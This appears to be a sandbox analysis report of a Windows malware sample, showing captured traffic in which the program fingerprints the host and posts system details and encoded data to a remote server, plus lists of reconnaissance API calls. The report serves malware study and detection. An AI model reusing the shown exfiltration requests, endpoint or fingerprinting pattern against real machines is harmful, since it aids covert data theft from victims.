                                                  Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 35 32 31 34 38 37 38 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
                                                  Data Ascii: { "ip": "8.46.123.189", "current_time": "1735214878", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 50, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 556 }, { "name": "services.exe", "pid": 624 }, { "name": "lsass.exe", "pid": 632 }, { "name": "svchost.exe", "pid": 748 }, { "name": "fontdrvhost.exe", "pid": 772 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "svchost.exe", "pid": 864 }, { "name": "svchost.exe", "pid": 912 }, { "name": "dwm.exe", "pid": 976 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 704 }, { "name": "svchost.exe", "pid": 860 }, { "name": "svchost.exe", "pid": [TRUNCATED]
Dec 26, 2024 13:08:01.786763906 CET | 2472 | OUT | Data Raw: 76 49 62 37 79 5a 58 74 55 55 5c 2f 30 33 4a 5c 2f 77 52 67 5c 2f 34 4a 72 6f 69 4b 33 37 4f 54 79 73 71 71 72 53 50 38 59 50 6a 77 48 6b 49 41 42 64 78 46 38 54 34 34 77 37 6b 62 6d 45 63 61 49 43 54 73 52 56 77 6f 5c 2f 67 66 78 6b 2b 6d 76 6d
                                                  Data Ascii: vIb7yZXtUU\/03J\/wRg\/4JroiK37OTysqqrSP8YPjwHkIABdxF8T44w7kbmEcaICTsRVwo\/gfxk+mvmvhv4n8V+G\/DHhPgeL\/wDUuWSYPO88zzxEr8G0p5vnXDmUcVwwWV4DA8A8aVcXhsLk2f5RKvjsViMvcsZXxGGpYScMN9Yqf63\/AEfv2a\/h34j+AnhZ42eLH0kOLfDfFeMmB4t4i4O4M8PfALKfFutheD+E\/EP
Dec 26, 2024 13:08:01.786814928 CET | 2472 | OUT | Data Raw: 39 68 69 67 72 5c 2f 6c 7a 5c 2f 77 42 75 6c 53 52 76 4d 33 5c 2f 4f 48 5c 2f 65 5c 2f 38 73 67 61 6a 33 4f 79 37 4d 5c 2f 35 2b 76 38 41 6e 38 36 66 5c 2f 66 38 41 6b 2b 54 50 58 7a 66 58 76 5c 2f 50 2b 64 4d 5c 2f 75 50 73 7a 2b 39 38 33 76 30
                                                  Data Ascii: 9higr\/lz\/wBulSRvM3\/OH\/e\/8sgaj3Oy7M\/5+v8An86f\/f8Ak+TPXzfXv\/P+dM\/uPsz+983v0\/w\/woOuG3z\/AERD5e3f8j7fN\/5aD8Pr1pnz\/K\/+uc\/63\/P+e1S853\/vP88\/av6\/\/XpskZ+T58OP8\/nUT2+f6M3p9fl+pD5m5tn8Z\/55n\/XZ\/wA+vvUNTNvkLx9pPr+5+nX\/AD25pnXf8km\/
Dec 26, 2024 13:08:01.786870003 CET | 2472 | OUT | Data Raw: 2f 31 39 58 66 34 64 50 35 34 71 61 4f 4f 52 6d 32 5c 2f 75 32 65 50 30 7a 30 46 51 78 5c 2f 4e 4a 5c 2f 66 38 76 74 4a 36 38 5c 2f 30 39 36 7a 39 6e 35 5c 2f 68 5c 2f 77 54 53 6e 31 2b 58 36 6a 50 6e 6a 6a 53 4e 48 6a 48 37 32 35 5c 2f 65 66 38
                                                  Data Ascii: /19Xf4dP54qaOORm2\/u2eP0z0FQx\/NJ\/f8vtJ68\/096z9n5\/h\/wTSn1+X6jPnjjSNHjH725\/ef89vx9fX6Yoz\/ABo8kLy\/vfM\/1EAz\/PvxT2k+Zk+\/HH+6\/wBVx3\/0rPpT5I3XZsT+f2j69vb\/AOuazND9yH+8fw\/kKbT36\/h\/U0yuLkfl\/XyP8nz9dP2IPEd3P8F9R0ZbhmtNP8Xavp93pk+250+9tZ
Dec 26, 2024 13:08:01.786892891 CET | 2472 | OUT | Data Raw: 63 6e 53 70 56 36 4f 47 6e 50 4d 48 67 71 74 65 57 4b 70 35 55 76 72 39 53 2b 48 69 36 72 6c 31 6e 57 5c 2f 47 4f 76 66 47 44 77 39 70 2b 74 2b 46 66 32 74 66 32 64 49 5c 2f 6a 33 34 79 6d 30 44 53 72 72 55 46 5c 2f 59 70 38 54 2b 42 7a 34 31 38
                                                  Data Ascii: cnSpV6OGnPMHgqteWKp5Uvr9S+Hi6rl1nW\/GOvfGDw9p+t+Ff2tf2dI\/j34ym0DSrrUF\/Yp8T+Bz418MfBzXPEjRXbaD49+M3j3T5NU8DfB3UfLmj06fRhqlnBDK2nNqHmv8Az3f8FG\/A1r8OP2tPiD4TtdUu9c+yaf4P1G71rUNN8OaVqOq3\/iDwtpXiC+vL+08KaL4e0P7SbnU5IjNa6TbSTxRRS3bXF209zN\/Sz40+
Dec 26, 2024 13:08:01.787009001 CET | 4944 | OUT | Data Raw: 48 68 5c 2f 68 33 36 78 6a 35 2b 79 71 76 4f 6f 56 4b 54 79 66 38 41 32 56 35 42 69 36 63 63 42 6a 48 4f 55 31 57 78 46 65 69 38 50 7a 30 70 53 6e 44 2b 39 54 53 72 5c 2f 54 66 32 74 66 32 55 4e 4e 31 52 49 37 37 77 62 70 48 37 54 50 37 50 4e 6e
                                                  Data Ascii: Hh\/h36xj5+yqvOoVKTyf8A2V5Bi6ccBjHOU1WxFei8Pz0pSnD+9TSr\/Tf2tf2UNN1RI77wbpH7TP7PNnfrEzQarqXhTTfjN8No7hY2YC0tdSvtCtfEgUsBbW95Pa5AhjkwvmXxk\/Z4+NXx6+Huu\/DL4m\/En9nbXvC+vQ7ZI2\/Zl+IsV\/pd\/Erix1zQ74\/tZvJpmtaZI7S2V7EpxultrmO5sbm6tZ\/y51X9rDw18Cf
Dec 26, 2024 13:08:01.787061930 CET | 2472 | OUT | Data Raw: 64 57 42 6a 6d 74 30 63 59 4b 68 6c 36 48 34 61 32 48 78 36 5c 2f 5a 48 2b 45 5c 2f 77 41 61 6c 38 52 66 44 58 51 5c 2f 45 75 6e 61 58 71 48 68 2b 66 77 7a 71 46 68 71 4d 4e 7a 6f 2b 71 57 47 70 76 34 6f 74 74 66 38 54 61 37 5a 32 6c 39 4c 66 58
                                                  Data Ascii: dWBjmt0cYKhl6H4a2Hx6\/ZH+E\/wAal8RfDXQ\/EunaXqHh+fwzqFhqMNzo+qWGpv4ottf8Ta7Z2l9LfXVjpUUPh22u7OXTtF1Z9PuLeO9uzp1kt1YcN+zZ4u03wn8Y\/Cupa9fW+maLOuradqeoSsix20N7pF9Hbu5kmgj2\/wBoLZBhJIcrnYrS+WK\/brQofh14qsnitNR0vxPbX9tJHNY3MsM0V1Z3MTRzRz6VMFae0nhZ
Dec 26, 2024 13:08:01.787101030 CET | 2472 | OUT | Data Raw: 46 58 44 75 57 48 71 51 6c 51 6b 34 50 38 79 76 2b 43 54 5c 2f 78 36 38 57 32 33 37 55 48 77 50 38 41 32 54 34 64 65 58 78 68 38 4a 64 48 2b 4e 76 78 4c 2b 4c 66 67 48 57 72 6b 58 46 76 63 36 58 4c 70 5c 2f 37 4e 58 37 51 76 68 6d 35 58 53 39 50
                                                  Data Ascii: FXDuWHqQlQk4P8yv+CT\/x68W237UHwP8A2T4deXxh8JdH+NvxL+LfgHWrkXFvc6XLp\/7NX7Qvhm5XS9PleZ9M0zxnY+L7PxBqOh3UiS6Hrenzg28Wo6nrTSav\/BVg5\/bk+LQ\/u6V8MB\/5i3wcf61+yH7N3\/BIT9mv9l340+DPjr4A8b\/HHWPF3gb\/AISL+ydO8YeJfAWoeHLj\/hJvCmu+D7\/+0bTRfhn4f1ObydM
Dec 26, 2024 13:08:01.787154913 CET | 2472 | OUT | Data Raw: 43 39 76 76 47 58 5c 2f 43 56 2b 4f 39 59 30 5c 2f 56 39 50 5c 2f 74 44 53 4e 51 30 50 52 50 38 41 68 48 72 61 46 74 4e 74 50 2b 45 65 5c 2f 74 4b 47 56 72 6e 56 72 78 45 2b 6c 66 41 76 37 50 76 37 63 57 67 66 74 4e 33 33 78 53 38 61 5c 2f 77 44
                                                  Data Ascii: C9vvGX\/CV+O9Y0\/V9P\/tDSNQ0PRP8AhHraFtNtP+Ee\/tKGVrnVrxE+lfAv7Pv7cWgftN33xS8a\/wDBQr\/hP\/2cJ\/GPxE1qz\/ZX\/wCGTfhD4V+weEvElp4mh8AeCv8AheGk61N47uv+Fa3WqeG7z\/hJJdPGp+Mf+EV+z61FBHrl+Y\/tPwh4T8O+AvCfhfwN4Q0q30Lwn4L8O6L4T8L6JaNM9ro\/h3w5ptto+iaV
Dec 26, 2024 13:08:01.787173986 CET | 2472 | OUT | Data Raw: 5c 2f 7a 5c 2f 6e 39 65 35 35 63 69 78 70 76 53 53 5a 50 39 62 37 35 39 65 76 70 5c 2f 6b 39 38 5c 2f 5a 2b 66 34 66 38 41 42 4c 35 33 35 66 31 38 79 47 52 6e 59 75 37 76 73 48 2b 72 5c 2f 77 42 56 62 5a 5c 2f 7a 2b 6e 39 57 62 64 32 39 33 54 79
                                                  Data Ascii: \/z\/n9e55cixpvSSZP9b759evp\/k98\/Z+f4f8ABL535f18yGRnYu7vsH+r\/wBVbZ\/z+n9Wbd293TyXk\/z9O+Of6U9Ixtf9zHsx\/H9OLX\/r+70yTPmP\/wC0\/wBxB6fX361majI9nmHfnf8A6qX\/AOSvw\/pTBIW+dHy\/\/PP\/AKd8emevSn7k+dHf5Jfs\/wDy1\/8AJr+nWofnXfsTy\/3f+rj\/AOW3+ld\/0
Dec 26, 2024 13:08:01.906723976 CET | 7416 | OUT | Data Raw: 68 6f 58 2b 75 52 51 61 65 50 45 66 6a 76 58 37 48 77 33 6f 6a 61 6a 4e 70 38 47 71 33 30 4e 67 75 6f 36 68 41 31 35 4c 5a 36 5a 66 33 55 64 75 4a 48 74 37 4f 35 6c 43 51 50 79 75 67 5c 2f 45 44 77 7a 72 30 56 32 30 47 73 61 4d 73 74 6e 72 47 71
                                                  Data Ascii: hoX+uRQaePEfjvX7Hw3ojajNp8Gq30Nguo6hA15LZ6Zf3UduJHt7O5lCQPyug\/EDwzr0V20GsaMstnrGqaHLGmq27rLe6RdNaXRtfPW1uJYTKhMTPawyFCpeKNiUH4jhfBv6O2D4u5KHB\/Cf+slbByzSOV1p4nFYD6nTr06EsVQyHFYqtkFKMK9SlT\/cYCE4SnC0UpRb\/ozGePv0qcw4FcsRx9x1\/qjhsfTyapnOHp4XBZ
Dec 26, 2024 13:08:05.768627882 CET | 157 | IN | HTTP/1.1 200 OK
                                                  Server: nginx/1.22.1
                                                  Date: Thu, 26 Dec 2024 12:08:05 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Content-Length: 1
                                                  Connection: close
                                                  Data Raw: 30
                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49712 | 185.121.15.192 | 80 | 6676 | C:\Users\user\Desktop\jklg6EIhyR.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 13:08:06.105479956 CET | 101 | OUT | GET /TQIuuaqjNpwYjtUvFojm1734579850?argument=0 HTTP/1.1
                                                  Host: home.twentytk20ht.top
                                                  Accept: */*
Dec 26, 2024 13:08:07.638019085 CET | 372 | IN | HTTP/1.1 404 NOT FOUND
                                                  Server: nginx/1.22.1
                                                  Date: Thu, 26 Dec 2024 12:08:07 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Content-Length: 207
                                                  Connection: close
                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                                  Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49718 | 185.121.15.192 | 80 | 6676 | C:\Users\user\Desktop\jklg6EIhyR.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 13:08:07.956662893 CET | 174 | OUT | POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1
                                                  Host: home.twentytk20ht.top
                                                  Accept: */*
                                                  Content-Type: application/json
                                                  Content-Length: 31
                                                  Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                  Data Ascii: { "id1": "0", "data": "Done1" }
Dec 26, 2024 13:08:09.587387085 CET | 372 | IN | HTTP/1.1 404 NOT FOUND
                                                  Server: nginx/1.22.1
                                                  Date: Thu, 26 Dec 2024 12:08:09 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Content-Length: 207
                                                  Connection: close
                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                                  Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49699 | 34.226.108.155 | 443 | 6676 | C:\Users\user\Desktop\jklg6EIhyR.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-26 12:07:59 UTC | 52 | OUT | GET /ip HTTP/1.1
                                                  Host: httpbin.org
                                                  Accept: */*
2024-12-26 12:07:59 UTC | 224 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 26 Dec 2024 12:07:59 GMT
                                                  Content-Type: application/json
                                                  Content-Length: 31
                                                  Connection: close
                                                  Server: gunicorn/19.9.0
                                                  Access-Control-Allow-Origin: *
                                                  Access-Control-Allow-Credentials: true
2024-12-26 12:07:59 UTC | 31 | IN | Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                  Data Ascii: { "origin": "8.46.123.189"}



Target ID: 0
Start time: 07:07:52
Start date: 26/12/2024
Path: C:\Users\user\Desktop\jklg6EIhyR.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\jklg6EIhyR.exe"
Imagebase: 0x770000
File size: 4'495'872 bytes
MD5 hash: BEC048B8A886AC4F2F72A47A41057F6D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true


                                                    Execution Graph

Execution Coverage: 2.2%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 20.3%
Total number of Nodes: 232
Total number of Limit Nodes: 33
Strings
Memory Dump Source
• Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
• Associated: 00000000.00000002.1430429452.0000000000770000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1430444255.0000000000E95000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1430444255.0000000000E97000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1430898281.0000000000E9A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1430912657.0000000000E9C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1430912657.0000000001026000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1430912657.000000000113E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1430912657.0000000001143000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1430912657.000000000121D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1430912657.0000000001226000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1430912657.0000000001234000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1431194841.0000000001235000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1431306823.00000000013F6000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
Similarity
• API ID:
• String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
• API String ID: 0-1590685507
• Opcode ID: a9802d2f20f504ebb27660564552b1487036ddc74a0ad28523d3df76394f2f1f
• Instruction ID: 66920e487e3d51771bf714ea28e703d3a07eaf1eb9912bd4e2be397fadbc5215
• Opcode Fuzzy Hash: a9802d2f20f504ebb27660564552b1487036ddc74a0ad28523d3df76394f2f1f
• Instruction Fuzzy Hash: 07C2BE31A043449FD724DF69C484B6AB7E1BFC9314F04866DEC989B2A2D779ED84CB81

Control-flow Graph

APIs
• GetSystemInfo.KERNELBASE ref: 00772579
• GlobalMemoryStatusEx.KERNELBASE ref: 007725CC
• GetDriveTypeA.KERNELBASE ref: 00772647
• GetDiskFreeSpaceExA.KERNELBASE ref: 0077267E
• KiUserCallbackDispatcher.NTDLL ref: 007727E2
• FindFirstFileW.KERNELBASE ref: 007728F8
• FindNextFileW.KERNELBASE ref: 0077291F
Strings
Similarity
• API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
• String ID: ;%w$@$`
• API String ID: 3271271169-1385483555
• Opcode ID: b21f4d638ba8e51927fb62258613d74051304ff5710bdc6ec154e85e00cc86b0
• Instruction ID: 045247fe6981c08ab9184a9669da2759e46e5a0a28542b4dae5fec0fba527057
• Opcode Fuzzy Hash: b21f4d638ba8e51927fb62258613d74051304ff5710bdc6ec154e85e00cc86b0
• Instruction Fuzzy Hash: 9CD1C6B49047099FDB00EF68D5856AEBBF1BF44354F0089AEE5A8D7311E7349A88CF52

Control-flow Graph

APIs
Strings
Similarity
• API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
• String ID: 0
• API String ID: 2406880114-4108050209
• Opcode ID: 7795d1ad01c8cf9000b7d82ec645b9c4e11c506ae26fdf346dc212f7014d8f6d
• Instruction ID: 17ada0a5eed7a0491e7795d278e9336e7fa2b027098d4eb00232bbd84eda9773
• Opcode Fuzzy Hash: 7795d1ad01c8cf9000b7d82ec645b9c4e11c506ae26fdf346dc212f7014d8f6d
• Instruction Fuzzy Hash: 80E128B0904309DFCB10EF68D9856ADBBF5AF44344F00886AE998DB351E778D989CF52

Control-flow Graph

APIs
• WSAEventSelect.WS2_32(?,?,?), ref: 00780711
• WSAEventSelect.WS2_32(?,?,00000000), ref: 007809DC
• WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 007809FC
Strings
Similarity
• API ID: EventSelect$EnumEventsNetwork
• String ID: N=w$multi.c
• API String ID: 2170980988-182558092
• Opcode ID: ea2a9b18c8ee74353627c7c9f85a050a819890120e33645f5da6314b37605f78
• Instruction ID: 0bef525b61cc46488b44fc9e771729cdd10786cef227bef29a9ec1b3ce28bd29
• Opcode Fuzzy Hash: ea2a9b18c8ee74353627c7c9f85a050a819890120e33645f5da6314b37605f78
• Instruction Fuzzy Hash: 97D1E2716483019FEB50EF24C885BAB77E5FF94344F04882CF88596252E778E948CB92

Control-flow Graph

APIs
• getsockname.WS2_32(-00000020,-00000020,?), ref: 0083B2B7
Strings
                                                    Similarity
                                                    • API ID: getsockname
                                                    • String ID: ares__sortaddrinfo.c$cur != NULL
                                                    • API String ID: 3358416759-2430778319
                                                    • Opcode ID: 2bbbedd60b124468ffb94744d412898b485026e27a8dbb9bcbf07b5ea4fc8702
                                                    • Instruction ID: f105197ce30e8f26775d39a58f2e82900ff145747eb0ee75a21b68e50ff06504
                                                    • Opcode Fuzzy Hash: 2bbbedd60b124468ffb94744d412898b485026e27a8dbb9bcbf07b5ea4fc8702
                                                    • Instruction Fuzzy Hash: 47C15DB16052159FD718DF28C891A6A77E1FFC8314F048968EA49CB3A2D735ED45CBC1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                     • Associated: 00000000.00000002.1430429452.0000000000770000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430444255.0000000000E95000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430444255.0000000000E97000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430898281.0000000000E9A000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430912657.0000000000E9C000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430912657.0000000001026000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430912657.000000000113E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430912657.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430912657.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430912657.0000000001226000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430912657.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1431194841.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1431306823.00000000013F6000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fa2d2f3c5559bfb4697de35072854721f9c297475a1a2127e46a49dfd833045f
                                                    • Instruction ID: 29f378974553375e84de7a132177709a6e06ce142c454e87d0fc319a338de7d7
                                                    • Opcode Fuzzy Hash: fa2d2f3c5559bfb4697de35072854721f9c297475a1a2127e46a49dfd833045f
                                                    • Instruction Fuzzy Hash: DE91E43064D3498BD739AA2888947BB72D5EFC4360F348B2CE8AA471D4EB79DC40D791
                                                    APIs
                                                    • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,0082712E,?,?,?,00001001,00000000), ref: 0083A90D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                     • Associated: 00000000.00000002.1430429452.0000000000770000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430444255.0000000000E95000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430444255.0000000000E97000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430898281.0000000000E9A000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430912657.0000000000E9C000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430912657.0000000001026000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430912657.000000000113E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430912657.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430912657.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430912657.0000000001226000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430912657.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1431194841.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1431306823.00000000013F6000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
                                                    Similarity
                                                    • API ID: recvfrom
                                                    • String ID:
                                                    • API String ID: 846543921-0
                                                    • Opcode ID: bc1d281dab4722c8db32bc410bbaab7c6f20365b27b18e0d3d61482b6a2aa296
                                                    • Instruction ID: 2bd84377653277c5aa3d2edde589d3feb507c50ae3cdf350cc3803f6deecb3eb
                                                    • Opcode Fuzzy Hash: bc1d281dab4722c8db32bc410bbaab7c6f20365b27b18e0d3d61482b6a2aa296
                                                    • Instruction Fuzzy Hash: 13F04975208308AFD2149B01DC84E6BBBEDFBC9758F05895DFD98232118270AE108AB2
                                                    APIs
                                                    • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0082A499
                                                    • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0082A4FB
                                                    • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0082A531
                                                    • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 0082AA19
                                                    • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0082AA4C
                                                    • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 0082AA97
                                                    • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0082AAE9
                                                    • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0082AB30
                                                    • RegCloseKey.KERNELBASE(?), ref: 0082AB6A
                                                    • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 0082AB82
                                                    • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 0082AC46
                                                    • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 0082AD0A
                                                    • RegEnumKeyExA.KERNELBASE ref: 0082AD8D
